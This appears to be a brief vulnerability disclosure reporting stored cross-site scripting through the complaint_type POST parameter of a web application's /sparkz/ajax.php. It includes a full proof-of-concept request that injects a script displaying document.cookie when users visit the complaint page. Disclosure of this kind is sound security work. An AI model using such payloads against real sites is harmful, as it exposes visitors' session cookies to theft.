BUG_Author: getshell
Vulnerability url: /sparkz/ajax.php
POST parameter complaint_type exists stored cross-site scripting
Payload:complainant_name=1&complaint_type=<script>alert(document.cookie)</script>&complaint=2&createComplaint=
Payload will trigger when a user visits on http://localhost/sparkz/index.php?complain

